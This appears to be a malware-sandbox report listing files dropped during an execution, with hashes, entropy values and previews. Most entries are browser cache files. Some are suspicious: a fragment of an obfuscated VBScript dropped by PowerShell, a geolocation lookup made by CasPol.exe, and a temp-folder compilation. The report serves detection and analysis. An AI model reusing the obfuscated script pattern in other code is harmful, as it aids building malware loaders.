                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):35
Entropy (8bit):4.014438730983427
Encrypted:false
SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:BB57A76019EADEDC27F04EB2FB1F1841
SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:false
Preview:{"forceServiceDetermination":false}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):50
Entropy (8bit):3.9904355005135823
Encrypted:false
SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
SHA1:5AAAC173107C688C06944D746394C21535B0514B
SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
Malicious:false
Preview:topTraffic_170540185939602997400506234197983529371
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):575056
Entropy (8bit):7.999649474060713
Encrypted:true
SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:BE5D1A12C1644421F877787F8E76642D
SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:false
Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):9
Entropy (8bit):3.169925001442312
Encrypted:false
SSDEEP:3:CMzOn:CM6
MD5:B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:false
Preview:uriCache_
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):179
Entropy (8bit):5.012049423288829
Encrypted:false
SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXXfU:YWLSGTt1o9LuLgfGBPAzkVj/T8lHfU
MD5:E40106BD416818F0E9EF8816C793E602
SHA1:8F7E8E1830489AB1DB6CDBBC294608A37FBE4B31
SHA-256:65EB872ED25545D340EF38CE3C5BF959F968754FCDEB2CD2267A583D83B1F092
SHA-512:B236FDEE99E5322B08FB659A95338A63289E9CDDC266E45EAE769444B42DB07BB4B891ECB9F30359EEC7CB0AFBA2FAE743A1A12749794035CBEB591BEB5E44E5
Malicious:false
Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732046019239404}]}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):85
Entropy (8bit):4.3488360343066725
Encrypted:false
SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
MD5:265DB1C9337422F9AF69EF2B4E1C7205
SHA1:3E38976BB5CF035C75C9BC185F72A80E70F41C2E
SHA-256:7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
SHA-512:3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
Malicious:false
Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):44170
Entropy (8bit):6.090520956326506
Encrypted:false
SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
MD5:F25ADC1325EDB7883A8F2DE24372A781
SHA1:9E1666A98593919EB1D757A66F662176E46173B5
SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):2278
Entropy (8bit):3.839573074433602
Encrypted:false
SSDEEP:48:uiTrlKxrgxExl9Il8ub+klazlqEgOmR9g9bZw49xbTbd1rc:mJYNblM1gOO9gbZPe
MD5:FAA952FF93BA372F6E657E0B942F0515
SHA1:F64257E3A42DFA54A0EE76728EF12F6ED5E31A02
SHA-256:1CF580CFCDD31D3E38A66857087B65C05CB3701303782DD428520CDEE2B9E546
SHA-512:707053363DDAC7DF63B57B2B49DEC6E2E5073D73C37BB2A70EC1BF7D2B05FFA612CFAB52EC0D60AB4F1ABAC4543F7CBF0BBFABCDA24C70CF2835B4DB16254F13
Malicious:false
Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.J.X.n.a.d.o.5.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.F.T.q.D.u.S.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4622
Entropy (8bit):4.00561747259816
Encrypted:false
SSDEEP:96:wY3AoC4hnuJvjWOqefZ6iJnaDIRau/lzWlVtIC3lhKLaEp:wHoC4hnuJ7W4Z6iJnLIutzehOaEp
MD5:9F2BEAFFADB8093FAE7A34C1417A0DA3
SHA1:4EA5EC43774C2404CDDD5DB20F4C4CA1DE14E32B
SHA-256:52A35B795EFBEC26322529E9BADFA68105AD1565806BE748855E4B241699B4BF
SHA-512:233BF63C1034B63A5DE71A46662017A868E768DA55D5EB145F18F8EA78952ECE64FE1AA15817CC01D36A242A5160FCC8343D82148812591542FA119029908014
Malicious:false
Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".O.E./.l.T.9.I.5.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.F.T.q.D.u.S.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):2684
                                                                                                                                                                                                                              Entropy (8bit):3.896546712014601
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xkMuxl9Il8u2OVv0Ew3z6oFmL/a99RM0f3Utp76ftd/vc:aEYgOVv0P6ImL/c7M0ctpP
                                                                                                                                                                                                                              MD5:A83F095C7D6D4A68FD4610510D426287
                                                                                                                                                                                                                              SHA1:93CCFFF717C5F9F1B0075B95B3E32CF40A02F3DD
                                                                                                                                                                                                                              SHA-256:1B74FE921DCB13F8A55BBEDB1270B81B6238F8EA2148285CBDD08518B48A3A28
                                                                                                                                                                                                                              SHA-512:22A376F992BF0DAD9881EF75CECDFC584D2332F38CF25FA366ECA9A7ED3804340580DC5FB9EED98F98A70810B4E6C7A7C10AEDC04DC251BE587D463D5BBEBB47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".f.c.+.v.g.K.N.Y.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.F.T.q.D.u.S.
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (372), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):140880
                                                                                                                                                                                                                              Entropy (8bit):3.673474644726778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:sK4Og9oq843Inb8CU3OuunFFKCLAgt5pKQGwm:sOaGb8CUxuFs
                                                                                                                                                                                                                              MD5:C9B675B1514C024221535D4BDE6F6C69
                                                                                                                                                                                                                              SHA1:24594969BC105AEC0E15F109872193C030C0C102
                                                                                                                                                                                                                              SHA-256:E58BA960C159E99A12D4C50D3FFFE4A9EE2B50F08E702BC90D4E18B7AA9421FB
                                                                                                                                                                                                                              SHA-512:328E530EB7ABB045624D793FAF89CCC1A16E0C1A1C58E3A33D2CB4BD955742D511F3B07D183423A7643A57579CDD0591D968640D106FAD5D1C6A4B1AD4C494D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..........F.u.n.c.t.i.o.n. .a.t.r.o.c.e.m.e.n.t.e.(.B.y.V.a.l. .a.l.t.e.r.n.i.p.e.n.n.e.,. .B.y.V.a.l. .e.m.p.a.r.e.d.a.r.,. .B.y.V.a.l. .m.a.i.o.r.i.n.o.)..... . . . .D.i.m. .f.u.l.i.g.i.n.o.s.o..... . . . .f.u.l.i.g.i.n.o.s.o. .=. .I.n.S.t.r.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .e.m.p.a.r.e.d.a.r.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .f.u.l.i.g.i.n.o.s.o. .>. .0..... . . . . . . . .a.l.t.e.r.n.i.p.e.n.n.e. .=. .L.e.f.t.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .f.u.l.i.g.i.n.o.s.o. .-. .1.). .&. .m.a.i.o.r.i.n.o. .&. .M.i.d.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .f.u.l.i.g.i.n.o.s.o. .+. .L.e.n.(.e.m.p.a.r.e.d.a.r.).)..... . . . . . . . .f.u.l.i.g.i.n.o.s.o. .=. .I.n.S.t.r.(.f.u.l.i.g.i.n.o.s.o. .+. .L.e.n.(.m.a.i.o.r.i.n.o.).,. .a.l.t.e.r.n.i.p.e.n.n.e.,. .e.m.p.a.r.e.d.a.r.)..... . . . .L.o.o.p..... . . . ..... . . . .a.t.r.o.c.e.m.e.n.t.e. .=. .a.l.t.e.r.n.i.p.e.n.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):956
                                                                                                                                                                                                                              Entropy (8bit):5.0171731747546415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qpQYdRNuKyGX85MEBZvXhNlT3/7l1DYro:OlPN0GX85dDvhjTZuro
                                                                                                                                                                                                                              MD5:BA2D0529EAA52268CF1C64FE5AF70F9E
                                                                                                                                                                                                                              SHA1:F7CEAA9E2724924B5FEEA5CA8C2BA5C6AACD56B8
                                                                                                                                                                                                                              SHA-256:F7E9130B5094A918CDF1AA99F559D3BD0123EDADA38F1215BD601C17F0F332D8
                                                                                                                                                                                                                              SHA-512:6EE6ED6A077527DD29E3065FD2D341F7697DC658303F2B684B6F1F8D8653F80A406876DB5C974B55FF3C7CA152B6CC029CBE66CB01FC0B4776728B014FA2D0CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{. "geoplugin_request":"155.94.241.187",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5829
                                                                                                                                                                                                                              Entropy (8bit):4.901113710259376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                                                                                              MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                                                                                              SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                                                                                              SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                                                                                              SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):135771
                                                                                                                                                                                                                              Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                              MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                              SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                              SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                              SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                              Malicious:false
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Nov 18 17:51:51 2024, 1st section name ".debug$S"
Category:dropped
Size (bytes):1336
Entropy (8bit):3.9910059158389597
Encrypted:false
SSDEEP:24:HFm9Iy/LHWwKTF9mfwI+ycuZhNS1akSD6PNnqSSd:FCLVKTfmo1ulGa3iqSC
MD5:3CD95C657DABAB693D123C64C3CDDC56
SHA1:5EE22F2CA7D1E266FA58CDF67990CB6382366884
SHA-256:C279456736F47F20F85F4C06B734629030A1F704D61E5E0368CAA86A619F32EC
SHA-512:79855C3B83F0832EC3C4EEA8CEE52D5D5161BA6777E33A68876EDEE43A841F7221DFF8F425C17A7A8BB8BFB083CFCEAC37A723453D58EEB512409D91E0BD3322
Malicious:false
Preview:L....~;g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP..................\0...n4_.U....[...........5.......C:\Users\user\AppData\Local\Temp\RESAD4B.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.z.f.3.q.r.f.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4194304
Entropy (8bit):0.04649138517252469
Encrypted:false
SSDEEP:192:WujUp0jLYiVWK++BhFNy5XJjpRlakC2GXnSgIbU5h/ZNEYIUVg1RQcG7xSUn8y0d:WOUp0jjlRwH8bhxPgrwxD08T2RGOD
MD5:5607F702C05108A63FE755574E18C906
SHA1:9AABA97B5D84DD33268B2034E60A87DF8406F0DC
SHA-256:C2C843C85F63A403F3235B5F57827B897DA6C657BEE130945980C354330336B1
                                                                                                                                                                                                                              SHA-512:2961B09AEEF2F1936DE17458BC3CE81AA3A88F27AA704C2E8DD2D0347359926543A21C2FFC487CE1D36DAC78713FDF29D0F68A11C3CCE2777284DA98712D6666
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:level=none expiry=0.
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
